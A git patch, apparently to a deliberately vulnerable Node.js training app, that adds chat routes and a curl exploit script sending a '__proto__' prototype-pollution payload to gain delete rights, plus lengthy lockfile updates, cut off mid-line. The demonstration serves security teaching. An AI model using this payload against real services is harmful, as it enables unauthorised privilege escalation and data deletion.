From 4093e6762c70c8e30023ed36d0ea1d3910a8c4f7 Mon Sep 17 00:00:00 2001 From: Kirill Date: Sun, 21 Apr 2019 19:58:39 +0300 Subject: [PATCH] feat: prototype-pollution vulnerable chat app (#575) --- app.js | 3 + exploits/prototype-pollution.sh | 38 ++ package-lock.json | 649 +++++++++++++++++--------------- package.json | 1 + routes/index.js | 64 ++++ 5 files changed, 461 insertions(+), 294 deletions(-) create mode 100755 exploits/prototype-pollution.sh diff --git a/app.js b/app.js index ac2cde72f9d..9cdbc049749 100644 --- a/app.js +++ b/app.js @@ -56,6 +56,9 @@ app.get('/edit/:id', routes.edit); app.post('/update/:id', routes.update); app.post('/import', routes.import); app.get('/about_new', routes.about_new); +app.get('/chat', routes.chat.get); +app.put('/chat', routes.chat.add); +app.delete('/chat', routes.chat.delete); // Static app.use(st({ path: './public', url: '/public' })); diff --git a/exploits/prototype-pollution.sh b/exploits/prototype-pollution.sh new file mode 100755 index 00000000000..4a921bdaa83 --- /dev/null +++ b/exploits/prototype-pollution.sh @@ -0,0 +1,38 @@ +# Working via curl + +if [ -z "$GOOF_HOST" ]; then + export GOOF_HOST=http://localhost:3001 +fi + +# Read messages +c1() +{ + curl --request GET --url "$GOOF_HOST/chat" +} + +# Send message +c2() +{ + curl --request PUT \ + --url "$GOOF_HOST/chat" \ + --header 'content-type: application/json' \ + --data '{"auth": {"name": "user", "password": "pwd"}, "message": {"text": "Hi!"}}' +} + +# Gain permissions +c3() +{ + curl --request PUT \ + --url "$GOOF_HOST/chat" \ + --header 'content-type: application/json' \ + --data '{"auth": {"name": "user", "password": "pwd"}, "message": { "text": "😈", "__proto__": {"canDelete": true}}}' +} + +# Delete message +c4() +{ + curl --request DELETE \ + --url "$GOOF_HOST/chat" \ + --header 'content-type: application/json' \ + --data '{"auth": {"name": "user", "password": "pwd"}, "messageId": 1}' +} diff --git a/package-lock.json b/package-lock.json index 4eab07bfdb0..47f5ec03a7c 100644 --- a/package-lock.json +++ b/package-lock.json @@ -1,49 +1,19 @@ { "name": "goof", - "version": "0.0.3", + "version": "1.0.1", "lockfileVersion": 1, "requires": true, "dependencies": { "@snyk/nodejs-runtime-agent": { - "version": "1.31.0", - "resolved": "https://registry.npmjs.org/@snyk/nodejs-runtime-agent/-/nodejs-runtime-agent-1.31.0.tgz", - "integrity": "sha512-q78acZAC0hNQwp2DcdQ7NeBBjq3MMQnbZ7h99uvcV4sg9G8u7g5GhIci1UMCc8quuQ72ggx33dzqKPdeS8+p/w==", + "version": "1.43.0", + "resolved": "https://registry.npmjs.org/@snyk/nodejs-runtime-agent/-/nodejs-runtime-agent-1.43.0.tgz", + "integrity": "sha512-08Ms+RUnENdTeHZQe+Lq/sXt5CTEZkV3HCNnEhUCt6Qn/u2S46TRnkTJVoNse5/qj9a0Rc/VXz5i2CFvvhTuXg==", "requires": { - "acorn": "^5.7.1", + "acorn": "5.7.1", "debug": "^4.0.1", "needle": "^2.2.1", "semver": "^5.5.1", "uuid": "^3.3.2" - }, - "dependencies": { - "acorn": { - "version": "5.7.3", - "resolved": "https://registry.npmjs.org/acorn/-/acorn-5.7.3.tgz", - "integrity": "sha512-T/zvzYRfbVojPWahDsE5evJdHb3oJoQfFbsrKM7w5Zcs++Tr257tia3BmMP8XYVjp1S9RZXQMh7gao96BlqZOw==" - }, - "debug": { - "version": "4.1.1", - "resolved": "https://registry.npmjs.org/debug/-/debug-4.1.1.tgz", - "integrity": "sha512-pYAIzeRo8J6KPEaJ0VWOh5Pzkbw/RetuzehGM7QRRX5he4fPHx2rdKMB256ehJCkX+XRQm16eZLqLNS8RSZXZw==", - "requires": { - "ms": "^2.1.1" - } - }, - "ms": { - "version": "2.1.1", - "resolved": "https://registry.npmjs.org/ms/-/ms-2.1.1.tgz", - "integrity": "sha512-tgp+dl5cGk28utYktBsrFqA7HKgrhgPsg6Z/EfhWI4gl1Hwq8B/GmY/0oXZ6nF8hDVesS/FpnYaD/kOWhYQvyg==" - }, - "semver": { - "version": "5.6.0", - "resolved": "https://registry.npmjs.org/semver/-/semver-5.6.0.tgz", - "integrity": "sha512-RS9R6R35NYgQn++fkDWaOmqGoj4Ek9gGs+DPxNUZKuwE183xjJroKvyo1IzVFeXvUrvmALy6FWD5xrdJT25gMg==" - }, - "uuid": { - "version": "3.3.2", - "resolved": "https://registry.npmjs.org/uuid/-/uuid-3.3.2.tgz", - "integrity": "sha512-yXJmeNaw3DnnKAOKJE51sL/ZaYfWJRl1pK9dr19YFCu0ObS231AB1/LbqTKRAQ5kw8A90rA6fr4riOUpTZvQZA==" - } } }, "JSONStream": { @@ -71,10 +41,9 @@ } }, "acorn": { - "version": "6.0.4", - "resolved": "https://registry.npmjs.org/acorn/-/acorn-6.0.4.tgz", - "integrity": "sha512-VY4i5EKSKkofY2I+6QLTbTTN/UvEQPCo6eiwzzSaSWfpaDhOmStMCMod6wmuPciNq+XS0faCglFu2lHZpdHUtg==", - "dev": true + "version": "5.7.1", + "resolved": "https://registry.npmjs.org/acorn/-/acorn-5.7.1.tgz", + "integrity": "sha512-d+nbxBUGKg7Arpsvbnlq61mc12ek3EY8EQldM3GPAhWJ1UVxC6TDGbIvUMNU6obBX3i1+ptCIzV4vq0gFPEGVQ==" }, "acorn-dynamic-import": { "version": "4.0.0", @@ -92,6 +61,14 @@ "acorn-dynamic-import": "^4.0.0", "acorn-walk": "^6.1.0", "xtend": "^4.0.1" + }, + "dependencies": { + "acorn": { + "version": "6.1.1", + "resolved": "https://registry.npmjs.org/acorn/-/acorn-6.1.1.tgz", + "integrity": "sha512-jPTiwtOxaHNaAPg/dmrJ/beuzLRnXtB0kQPQ8JpotKJgTB6rX6c8mlf315941pyjBSaPg8NHXS9fhP4u17DpGA==", + "dev": true + } } }, "acorn-walk": { @@ -102,7 +79,7 @@ }, "adm-zip": { "version": "0.4.7", - "resolved": "http://registry.npmjs.org/adm-zip/-/adm-zip-0.4.7.tgz", + "resolved": "https://registry.npmjs.org/adm-zip/-/adm-zip-0.4.7.tgz", "integrity": "sha1-hgbCy/HEJs6MjsABdER/1Jtur8E=" }, "ansi-regex": { @@ -175,7 +152,7 @@ }, "util": { "version": "0.10.3", - "resolved": "http://registry.npmjs.org/util/-/util-0.10.3.tgz", + "resolved": "https://registry.npmjs.org/util/-/util-0.10.3.tgz", "integrity": "sha1-evsa/lCAUkZInj23/g7TeTNqwPk=", "dev": true, "requires": { @@ -192,7 +169,7 @@ }, "async": { "version": "0.9.0", - "resolved": "http://registry.npmjs.org/async/-/async-0.9.0.tgz", + "resolved": "https://registry.npmjs.org/async/-/async-0.9.0.tgz", "integrity": "sha1-rDYTsdqb7RtHUQu0ZRuJMeRxRsc=" }, "async-cache": { @@ -248,29 +225,16 @@ }, "bl": { "version": "0.9.5", - "resolved": "http://registry.npmjs.org/bl/-/bl-0.9.5.tgz", + "resolved": "https://registry.npmjs.org/bl/-/bl-0.9.5.tgz", "integrity": "sha1-wGt5evCF6gC8Unr8jvzxHeIjIFQ=", "requires": { "readable-stream": "~1.0.26" - }, - "dependencies": { - "readable-stream": { - "version": "1.0.34", - "resolved": "http://registry.npmjs.org/readable-stream/-/readable-stream-1.0.34.tgz", - "integrity": "sha1-Elgg40vIQtLyqq+v5MKRbuMsFXw=", - "requires": { - "core-util-is": "~1.0.0", - "inherits": "~2.0.1", - "isarray": "0.0.1", - "string_decoder": "~0.10.x" - } - } } }, "bluebird": { - "version": "3.5.3", - "resolved": "https://registry.npmjs.org/bluebird/-/bluebird-3.5.3.tgz", - "integrity": "sha512-/qKPUQlaW1OyR51WeCPBvRnAlnZFUJkCSG5HzGnuIqhgyJtF+T94lFnn33eiazjRm2LAHVy2guNnaq48X9SJuw==" + "version": "3.5.4", + "resolved": "https://registry.npmjs.org/bluebird/-/bluebird-3.5.4.tgz", + "integrity": "sha512-FG+nFEZChJrbQ9tIccIfZJBz3J7mLrAhxakAbnrJWn8d7aKOC+LWifa0G+p4ZqKp4y13T7juYvdhq9NzKdsrjw==" }, "bn.js": { "version": "4.11.8", @@ -280,7 +244,7 @@ }, "body-parser": { "version": "1.9.0", - "resolved": "http://registry.npmjs.org/body-parser/-/body-parser-1.9.0.tgz", + "resolved": "https://registry.npmjs.org/body-parser/-/body-parser-1.9.0.tgz", "integrity": "sha1-ldcpQ7Gk9n9Wu6yeDcyDe2hwNgU=", "requires": { "bytes": "1.0.0", @@ -291,12 +255,20 @@ "qs": "2.2.4", "raw-body": "1.3.0", "type-is": "~1.5.1" + }, + "dependencies": { + "iconv-lite": { + "version": "0.4.4", + "resolved": "https://registry.npmjs.org/iconv-lite/-/iconv-lite-0.4.4.tgz", + "integrity": "sha1-6V8uQdsHNfwhZS94J6XuMuY8g6g=" + } } }, "boom": { "version": "0.4.2", - "resolved": "http://registry.npmjs.org/boom/-/boom-0.4.2.tgz", + "resolved": "https://registry.npmjs.org/boom/-/boom-0.4.2.tgz", "integrity": "sha1-emNune1O/O+xnO9JR6PGffrukRs=", + "optional": true, "requires": { "hoek": "0.9.x" } @@ -318,7 +290,7 @@ }, "browser-pack": { "version": "6.1.0", - "resolved": "http://registry.npmjs.org/browser-pack/-/browser-pack-6.1.0.tgz", + "resolved": "https://registry.npmjs.org/browser-pack/-/browser-pack-6.1.0.tgz", "integrity": "sha512-erYug8XoqzU3IfcU8fUgyHqyOXqIE4tUTTQ+7mqUjQlvnXkOO6OlT9c/ZoJVHYoAaqGxr09CN53G7XIsO4KtWA==", "dev": true, "requires": { @@ -349,7 +321,7 @@ "dependencies": { "resolve": { "version": "1.1.7", - "resolved": "http://registry.npmjs.org/resolve/-/resolve-1.1.7.tgz", + "resolved": "https://registry.npmjs.org/resolve/-/resolve-1.1.7.tgz", "integrity": "sha1-IDEU2CrSxe2ejgQRs5ModeiJ6Xs=", "dev": true } @@ -357,7 +329,7 @@ }, "browserify": { "version": "13.3.0", - "resolved": "http://registry.npmjs.org/browserify/-/browserify-13.3.0.tgz", + "resolved": "https://registry.npmjs.org/browserify/-/browserify-13.3.0.tgz", "integrity": "sha1-tanJAgJD8McORnW+yCI7xifkFc4=", "dev": true, "requires": { @@ -430,7 +402,7 @@ }, "readable-stream": { "version": "2.3.6", - "resolved": "http://registry.npmjs.org/readable-stream/-/readable-stream-2.3.6.tgz", + "resolved": "https://registry.npmjs.org/readable-stream/-/readable-stream-2.3.6.tgz", "integrity": "sha512-tQtKA9WIAhBF3+VLAseyMqZeBjW0AHJoxOtYqSUZNJxauErmLbVm2FW1y+J/YA9dUrAC39ITejlZWhVIwawkKw==", "dev": true, "requires": { @@ -445,7 +417,7 @@ "dependencies": { "string_decoder": { "version": "1.1.1", - "resolved": "http://registry.npmjs.org/string_decoder/-/string_decoder-1.1.1.tgz", + "resolved": "https://registry.npmjs.org/string_decoder/-/string_decoder-1.1.1.tgz", "integrity": "sha512-n/ShnvDi6FHbbVfviro+WojiFzv+s8MPMHBczVePfUpDJLwoLT0ht1l4YwBCbi8pJAveEEdnkHyPyTP/mzRfwg==", "dev": true, "requires": { @@ -458,7 +430,7 @@ }, "browserify-aes": { "version": "1.2.0", - "resolved": "http://registry.npmjs.org/browserify-aes/-/browserify-aes-1.2.0.tgz", + "resolved": "https://registry.npmjs.org/browserify-aes/-/browserify-aes-1.2.0.tgz", "integrity": "sha512-+7CHXqGuspUn/Sl5aO7Ea0xWGAtETPXNSAjHo48JfLdPWcMng33Xe4znFvQweqc/uzk5zSOI3H52CYnjCfb5hA==", "dev": true, "requires": { @@ -495,7 +467,7 @@ }, "browserify-rsa": { "version": "4.0.1", - "resolved": "http://registry.npmjs.org/browserify-rsa/-/browserify-rsa-4.0.1.tgz", + "resolved": "https://registry.npmjs.org/browserify-rsa/-/browserify-rsa-4.0.1.tgz", "integrity": "sha1-IeCr+vbyApzy+vsTNWenAdQTVSQ=", "dev": true, "requires": { @@ -529,12 +501,12 @@ }, "bson": { "version": "0.4.23", - "resolved": "http://registry.npmjs.org/bson/-/bson-0.4.23.tgz", + "resolved": "https://registry.npmjs.org/bson/-/bson-0.4.23.tgz", "integrity": "sha1-5louPHUH/63kEJvHV1p25Q+NqRU=" }, "buffer": { "version": "4.9.1", - "resolved": "http://registry.npmjs.org/buffer/-/buffer-4.9.1.tgz", + "resolved": "https://registry.npmjs.org/buffer/-/buffer-4.9.1.tgz", "integrity": "sha1-bRu2AbB6TvztlwlBMgkwJ8lbwpg=", "dev": true, "requires": { @@ -570,12 +542,11 @@ "dev": true }, "busboy": { - "version": "0.2.14", - "resolved": "https://registry.npmjs.org/busboy/-/busboy-0.2.14.tgz", - "integrity": "sha1-bCpiLvz0fFe7vh4qnDetNseSVFM=", + "version": "0.3.1", + "resolved": "https://registry.npmjs.org/busboy/-/busboy-0.3.1.tgz", + "integrity": "sha512-y7tTxhGKXcyBxRKAni+awqx8uqaJKrSFSNFSeRG5CsWNdmy2BIK+6VGWEW7TZnIO/533mtMEA4rOevQV815YJw==", "requires": { - "dicer": "0.2.5", - "readable-stream": "1.1.x" + "dicer": "0.3.0" } }, "bytes": { @@ -595,18 +566,18 @@ "integrity": "sha1-gWfBq4OX+1u5X5bSjlqBxQ8kesQ=" }, "cfenv": { - "version": "1.1.0", - "resolved": "https://registry.npmjs.org/cfenv/-/cfenv-1.1.0.tgz", - "integrity": "sha512-AFKB0Vbo0e7jIOfhocvEFe9C/P2kadgTuF+ASDVUAs3gco99XWxWeipimxMkwsZmuvg/EKVLApzXthEpkUDXJg==", + "version": "1.2.2", + "resolved": "https://registry.npmjs.org/cfenv/-/cfenv-1.2.2.tgz", + "integrity": "sha512-fl8xrG9ezqfO7L664lL+/vkqXun0D/xS/0IJ9++IMHLR6SI0If56C/KIHy9oIGb8jq9swHZFdct1MfN/80yYUw==", "requires": { - "js-yaml": "3.11.x", + "js-yaml": "3.13.x", "ports": "1.1.x", - "underscore": "1.8.x" + "underscore": "1.9.x" } }, "chalk": { "version": "1.1.3", - "resolved": "http://registry.npmjs.org/chalk/-/chalk-1.1.3.tgz", + "resolved": "https://registry.npmjs.org/chalk/-/chalk-1.1.3.tgz", "integrity": "sha1-qBFcVeSnAv5NFQq9OHKCKn4J/Jg=", "requires": { "ansi-styles": "^2.2.1", @@ -666,7 +637,7 @@ }, "combined-stream": { "version": "0.0.7", - "resolved": "http://registry.npmjs.org/combined-stream/-/combined-stream-0.0.7.tgz", + "resolved": "https://registry.npmjs.org/combined-stream/-/combined-stream-0.0.7.tgz", "integrity": "sha1-ATfmV7qlp1QcV6w3rF/AfXO03B8=", "optional": true, "requires": { @@ -674,9 +645,9 @@ } }, "commander": { - "version": "2.19.0", - "resolved": "https://registry.npmjs.org/commander/-/commander-2.19.0.tgz", - "integrity": "sha512-6tvAOO+D6OENvRAh524Dh9jcfKTYDQAqvqezbCW82xj5X0pSrcpxtvRKHLG0yBY6SD7PSDrJaj+0AiOcKVd1Xg==" + "version": "2.20.0", + "resolved": "https://registry.npmjs.org/commander/-/commander-2.20.0.tgz", + "integrity": "sha512-7j2y+40w61zy6YC2iRNpUe/NwhNyoXrYpHMrSunaMG64nRnaf96zO/KMQR4OyN/UnE5KLyEBnKHd4aG3rskjpQ==" }, "concat-map": { "version": "0.0.1", @@ -708,7 +679,7 @@ }, "readable-stream": { "version": "2.0.6", - "resolved": "http://registry.npmjs.org/readable-stream/-/readable-stream-2.0.6.tgz", + "resolved": "https://registry.npmjs.org/readable-stream/-/readable-stream-2.0.6.tgz", "integrity": "sha1-j5A0HmilPMySh4jaz80Rs265t44=", "dev": true, "requires": { @@ -781,7 +752,7 @@ }, "convert-source-map": { "version": "1.1.3", - "resolved": "http://registry.npmjs.org/convert-source-map/-/convert-source-map-1.1.3.tgz", + "resolved": "https://registry.npmjs.org/convert-source-map/-/convert-source-map-1.1.3.tgz", "integrity": "sha1-SCnId+n+SbMWHzvzZziI4gRpmGA=", "dev": true }, @@ -833,7 +804,7 @@ }, "boom": { "version": "2.10.1", - "resolved": "http://registry.npmjs.org/boom/-/boom-2.10.1.tgz", + "resolved": "https://registry.npmjs.org/boom/-/boom-2.10.1.tgz", "integrity": "sha1-OciRjO/1eZ+D+UkqhI9iWt0Mdm8=", "requires": { "hoek": "2.x.x" @@ -854,7 +825,7 @@ }, "cryptiles": { "version": "2.0.5", - "resolved": "http://registry.npmjs.org/cryptiles/-/cryptiles-2.0.5.tgz", + "resolved": "https://registry.npmjs.org/cryptiles/-/cryptiles-2.0.5.tgz", "integrity": "sha1-O9/s3GCBR8HGcgL6KR59ylnqo7g=", "requires": { "boom": "2.x.x" @@ -887,7 +858,7 @@ }, "hawk": { "version": "3.1.3", - "resolved": "http://registry.npmjs.org/hawk/-/hawk-3.1.3.tgz", + "resolved": "https://registry.npmjs.org/hawk/-/hawk-3.1.3.tgz", "integrity": "sha1-B4REvXwWQLD+VA0sm3PVlnjo4cQ=", "requires": { "boom": "2.x.x", @@ -898,7 +869,7 @@ }, "hoek": { "version": "2.16.3", - "resolved": "http://registry.npmjs.org/hoek/-/hoek-2.16.3.tgz", + "resolved": "https://registry.npmjs.org/hoek/-/hoek-2.16.3.tgz", "integrity": "sha1-ILt0A9POo5jpHcRxCo/xuCdKJe0=" }, "http-signature": { @@ -921,16 +892,16 @@ } }, "mime-db": { - "version": "1.37.0", - "resolved": "https://registry.npmjs.org/mime-db/-/mime-db-1.37.0.tgz", - "integrity": "sha512-R3C4db6bgQhlIhPU48fUtdVmKnflq+hRdad7IyKhtFj06VPNVdk2RhiYL3UjQIlso8L+YxAtFkobT0VK+S/ybg==" + "version": "1.39.0", + "resolved": "https://registry.npmjs.org/mime-db/-/mime-db-1.39.0.tgz", + "integrity": "sha512-DTsrw/iWVvwHH+9Otxccdyy0Tgiil6TWK/xhfARJZF/QFhwOgZgOIvA2/VIGpM8U7Q8z5nDmdDWC6tuVMJNibw==" }, "mime-types": { - "version": "2.1.21", - "resolved": "https://registry.npmjs.org/mime-types/-/mime-types-2.1.21.tgz", - "integrity": "sha512-3iL6DbwpyLzjR3xHSFNFeb9Nz/M8WDkX33t1GFQnFOllWk8pOrh/LSrB5OXlnlW5P9LH73X6loW/eogc+F5lJg==", + "version": "2.1.23", + "resolved": "https://registry.npmjs.org/mime-types/-/mime-types-2.1.23.tgz", + "integrity": "sha512-ROk/m+gMVSrRxTkMlaQOvFmFmYDc7sZgrjjM76abqmd2Cc5fCV7jAMA5XUccEtJ3cYiYdgixUVI+fApc2LkXlw==", "requires": { - "mime-db": "~1.37.0" + "mime-db": "~1.39.0" } }, "oauth-sign": { @@ -950,7 +921,7 @@ }, "request": { "version": "2.79.0", - "resolved": "http://registry.npmjs.org/request/-/request-2.79.0.tgz", + "resolved": "https://registry.npmjs.org/request/-/request-2.79.0.tgz", "integrity": "sha1-Tf5b9r6LjNw3/Pk+BLZVd3InEN4=", "requires": { "aws-sign2": "~0.6.0", @@ -977,7 +948,7 @@ }, "sntp": { "version": "1.0.9", - "resolved": "http://registry.npmjs.org/sntp/-/sntp-1.0.9.tgz", + "resolved": "https://registry.npmjs.org/sntp/-/sntp-1.0.9.tgz", "integrity": "sha1-ZUEYTMkK7qbG57NeJlkIJEPGYZg=", "requires": { "hoek": "2.x.x" @@ -985,16 +956,11 @@ }, "tough-cookie": { "version": "2.3.4", - "resolved": "http://registry.npmjs.org/tough-cookie/-/tough-cookie-2.3.4.tgz", + "resolved": "https://registry.npmjs.org/tough-cookie/-/tough-cookie-2.3.4.tgz", "integrity": "sha512-TZ6TTfI5NtZnuyy/Kecv+CnoROnyXn2DN97LontgQpCwsX2XyLYCC0ENhYkehSOwAp8rTQKc/NUIF7BkQ5rKLA==", "requires": { "punycode": "^1.4.1" } - }, - "uuid": { - "version": "3.3.2", - "resolved": "https://registry.npmjs.org/uuid/-/uuid-3.3.2.tgz", - "integrity": "sha512-yXJmeNaw3DnnKAOKJE51sL/ZaYfWJRl1pK9dr19YFCu0ObS231AB1/LbqTKRAQ5kw8A90rA6fr4riOUpTZvQZA==" } } }, @@ -1015,7 +981,7 @@ }, "create-hash": { "version": "1.2.0", - "resolved": "http://registry.npmjs.org/create-hash/-/create-hash-1.2.0.tgz", + "resolved": "https://registry.npmjs.org/create-hash/-/create-hash-1.2.0.tgz", "integrity": "sha512-z00bCGNHDG8mHAkP7CtT1qVu+bFQUPjYq/4Iv3C3kWjTFV10zIjfSoeqXo9Asws8gwSHDGj/hl2u4OGIjapeCg==", "dev": true, "requires": { @@ -1028,7 +994,7 @@ }, "create-hmac": { "version": "1.1.7", - "resolved": "http://registry.npmjs.org/create-hmac/-/create-hmac-1.1.7.tgz", + "resolved": "https://registry.npmjs.org/create-hmac/-/create-hmac-1.1.7.tgz", "integrity": "sha512-MJG9liiZ+ogc4TzUwuvbER1JRdgvUFSB5+VR/g5h82fGaIRWMWddtKBHi7/sVhfjQZ6SehlyhvQYrcYkaUIpLg==", "dev": true, "requires": { @@ -1062,7 +1028,7 @@ }, "cryptiles": { "version": "0.2.2", - "resolved": "http://registry.npmjs.org/cryptiles/-/cryptiles-0.2.2.tgz", + "resolved": "https://registry.npmjs.org/cryptiles/-/cryptiles-0.2.2.tgz", "integrity": "sha1-7ZH/HxetE9N0gohZT4pIoNJvMlw=", "optional": true, "requires": { @@ -1090,10 +1056,16 @@ }, "ctype": { "version": "0.5.3", - "resolved": "http://registry.npmjs.org/ctype/-/ctype-0.5.3.tgz", + "resolved": "https://registry.npmjs.org/ctype/-/ctype-0.5.3.tgz", "integrity": "sha1-gsGMJGH3QRTvFsE1IkrQuRRMoS8=", "optional": true }, + "dash-ast": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/dash-ast/-/dash-ast-1.0.0.tgz", + "integrity": "sha512-Vy4dx7gquTeMcQR/hDkYLGUnwVil6vk4FOOct+djUnHOUWt+zJPJAaRIXaAFkPXtJjvlY7o3rfRu0/3hpnwoUA==", + "dev": true + }, "dashdash": { "version": "1.14.1", "resolved": "https://registry.npmjs.org/dashdash/-/dashdash-1.14.1.tgz", @@ -1116,17 +1088,17 @@ "dev": true }, "debug": { - "version": "2.2.0", - "resolved": "http://registry.npmjs.org/debug/-/debug-2.2.0.tgz", - "integrity": "sha1-+HBX6ZWxofauaklgZkE3vFbwOdo=", + "version": "4.1.1", + "resolved": "https://registry.npmjs.org/debug/-/debug-4.1.1.tgz", + "integrity": "sha512-pYAIzeRo8J6KPEaJ0VWOh5Pzkbw/RetuzehGM7QRRX5he4fPHx2rdKMB256ehJCkX+XRQm16eZLqLNS8RSZXZw==", "requires": { - "ms": "0.7.1" + "ms": "^2.1.1" }, "dependencies": { "ms": { - "version": "0.7.1", - "resolved": "http://registry.npmjs.org/ms/-/ms-0.7.1.tgz", - "integrity": "sha1-nNE8A62/8ltl7/3nzoZO6VIBcJg=" + "version": "2.1.1", + "resolved": "https://registry.npmjs.org/ms/-/ms-2.1.1.tgz", + "integrity": "sha512-tgp+dl5cGk28utYktBsrFqA7HKgrhgPsg6Z/EfhWI4gl1Hwq8B/GmY/0oXZ6nF8hDVesS/FpnYaD/kOWhYQvyg==" } } }, @@ -1153,12 +1125,12 @@ }, "depd": { "version": "1.0.1", - "resolved": "http://registry.npmjs.org/depd/-/depd-1.0.1.tgz", + "resolved": "https://registry.npmjs.org/depd/-/depd-1.0.1.tgz", "integrity": "sha1-gK7GTJ1tl+ZcwqnKqTwKpqv3Oqo=" }, "deps-sort": { "version": "2.0.0", - "resolved": "http://registry.npmjs.org/deps-sort/-/deps-sort-2.0.0.tgz", + "resolved": "https://registry.npmjs.org/deps-sort/-/deps-sort-2.0.0.tgz", "integrity": "sha1-CRckkC6EZYJg65EHSMzNGvbiH7U=", "dev": true, "requires": { @@ -1193,12 +1165,6 @@ "defined": "^1.0.0" }, "dependencies": { - "acorn": { - "version": "5.7.3", - "resolved": "https://registry.npmjs.org/acorn/-/acorn-5.7.3.tgz", - "integrity": "sha512-T/zvzYRfbVojPWahDsE5evJdHb3oJoQfFbsrKM7w5Zcs++Tr257tia3BmMP8XYVjp1S9RZXQMh7gao96BlqZOw==", - "dev": true - }, "defined": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/defined/-/defined-1.0.0.tgz", @@ -1208,11 +1174,10 @@ } }, "dicer": { - "version": "0.2.5", - "resolved": "https://registry.npmjs.org/dicer/-/dicer-0.2.5.tgz", - "integrity": "sha1-WZbAhrszIYyBLAkL3cCc0S+stw8=", + "version": "0.3.0", + "resolved": "https://registry.npmjs.org/dicer/-/dicer-0.3.0.tgz", + "integrity": "sha512-MdceRRWqltEG2dZqO769g27N/3PXfcKl04VhYnBlo2YhH7zPi88VebsjTKclaOyiuMaGU72hTfw3VkUitGcVCA==", "requires": { - "readable-stream": "1.1.x", "streamsearch": "0.1.2" } }, @@ -1223,7 +1188,7 @@ }, "diffie-hellman": { "version": "5.0.3", - "resolved": "http://registry.npmjs.org/diffie-hellman/-/diffie-hellman-5.0.3.tgz", + "resolved": "https://registry.npmjs.org/diffie-hellman/-/diffie-hellman-5.0.3.tgz", "integrity": "sha512-kqag/Nl+f3GwyK25fhUMYj81BUOrZ9IuJsjIcDE5icNM9FJHAVm3VcUDxdLPoQtTuUylWm6ZIknYJwwaPxsUzg==", "dev": true, "requires": { @@ -1240,7 +1205,7 @@ }, "duplexer": { "version": "0.1.1", - "resolved": "http://registry.npmjs.org/duplexer/-/duplexer-0.1.1.tgz", + "resolved": "https://registry.npmjs.org/duplexer/-/duplexer-0.1.1.tgz", "integrity": "sha1-rOb/gIwc5mtX0ev5eXessCM0z8E=" }, "duplexer2": { @@ -1260,7 +1225,7 @@ }, "readable-stream": { "version": "2.3.6", - "resolved": "http://registry.npmjs.org/readable-stream/-/readable-stream-2.3.6.tgz", + "resolved": "https://registry.npmjs.org/readable-stream/-/readable-stream-2.3.6.tgz", "integrity": "sha512-tQtKA9WIAhBF3+VLAseyMqZeBjW0AHJoxOtYqSUZNJxauErmLbVm2FW1y+J/YA9dUrAC39ITejlZWhVIwawkKw==", "dev": true, "requires": { @@ -1275,7 +1240,7 @@ }, "string_decoder": { "version": "1.1.1", - "resolved": "http://registry.npmjs.org/string_decoder/-/string_decoder-1.1.1.tgz", + "resolved": "https://registry.npmjs.org/string_decoder/-/string_decoder-1.1.1.tgz", "integrity": "sha512-n/ShnvDi6FHbbVfviro+WojiFzv+s8MPMHBczVePfUpDJLwoLT0ht1l4YwBCbi8pJAveEEdnkHyPyTP/mzRfwg==", "dev": true, "requires": { @@ -1354,7 +1319,7 @@ }, "es6-promise": { "version": "2.1.1", - "resolved": "http://registry.npmjs.org/es6-promise/-/es6-promise-2.1.1.tgz", + "resolved": "https://registry.npmjs.org/es6-promise/-/es6-promise-2.1.1.tgz", "integrity": "sha1-A+jzxyl5KOVHjWqx0GQyUVB73t0=" }, "escape-html": { @@ -1382,7 +1347,7 @@ }, "events": { "version": "1.1.1", - "resolved": "http://registry.npmjs.org/events/-/events-1.1.1.tgz", + "resolved": "https://registry.npmjs.org/events/-/events-1.1.1.tgz", "integrity": "sha1-nr23Y1rQmccNzEwqH1AEKI6L2SQ=", "dev": true }, @@ -1403,7 +1368,7 @@ }, "express": { "version": "4.12.4", - "resolved": "http://registry.npmjs.org/express/-/express-4.12.4.tgz", + "resolved": "https://registry.npmjs.org/express/-/express-4.12.4.tgz", "integrity": "sha1-j+wlECVbxrLlgQfEgjnA+jB8GqI=", "requires": { "accepts": "~1.2.7", @@ -1446,24 +1411,37 @@ "resolved": "https://registry.npmjs.org/cookie-signature/-/cookie-signature-1.0.6.tgz", "integrity": "sha1-4wOogrNCzD7oylE6eZmXNNqzriw=" }, + "debug": { + "version": "2.2.0", + "resolved": "https://registry.npmjs.org/debug/-/debug-2.2.0.tgz", + "integrity": "sha1-+HBX6ZWxofauaklgZkE3vFbwOdo=", + "requires": { + "ms": "0.7.1" + } + }, "ee-first": { "version": "1.1.0", "resolved": "https://registry.npmjs.org/ee-first/-/ee-first-1.1.0.tgz", "integrity": "sha1-ag18YiHkkP7v2S7D9EHJzozQl/Q=" }, "mime-db": { - "version": "1.37.0", - "resolved": "https://registry.npmjs.org/mime-db/-/mime-db-1.37.0.tgz", - "integrity": "sha512-R3C4db6bgQhlIhPU48fUtdVmKnflq+hRdad7IyKhtFj06VPNVdk2RhiYL3UjQIlso8L+YxAtFkobT0VK+S/ybg==" + "version": "1.39.0", + "resolved": "https://registry.npmjs.org/mime-db/-/mime-db-1.39.0.tgz", + "integrity": "sha512-DTsrw/iWVvwHH+9Otxccdyy0Tgiil6TWK/xhfARJZF/QFhwOgZgOIvA2/VIGpM8U7Q8z5nDmdDWC6tuVMJNibw==" }, "mime-types": { - "version": "2.1.21", - "resolved": "https://registry.npmjs.org/mime-types/-/mime-types-2.1.21.tgz", - "integrity": "sha512-3iL6DbwpyLzjR3xHSFNFeb9Nz/M8WDkX33t1GFQnFOllWk8pOrh/LSrB5OXlnlW5P9LH73X6loW/eogc+F5lJg==", + "version": "2.1.23", + "resolved": "https://registry.npmjs.org/mime-types/-/mime-types-2.1.23.tgz", + "integrity": "sha512-ROk/m+gMVSrRxTkMlaQOvFmFmYDc7sZgrjjM76abqmd2Cc5fCV7jAMA5XUccEtJ3cYiYdgixUVI+fApc2LkXlw==", "requires": { - "mime-db": "~1.37.0" + "mime-db": "~1.39.0" } }, + "ms": { + "version": "0.7.1", + "resolved": "https://registry.npmjs.org/ms/-/ms-0.7.1.tgz", + "integrity": "sha1-nNE8A62/8ltl7/3nzoZO6VIBcJg=" + }, "negotiator": { "version": "0.5.3", "resolved": "https://registry.npmjs.org/negotiator/-/negotiator-0.5.3.tgz", @@ -1479,7 +1457,7 @@ }, "qs": { "version": "2.4.2", - "resolved": "http://registry.npmjs.org/qs/-/qs-2.4.2.tgz", + "resolved": 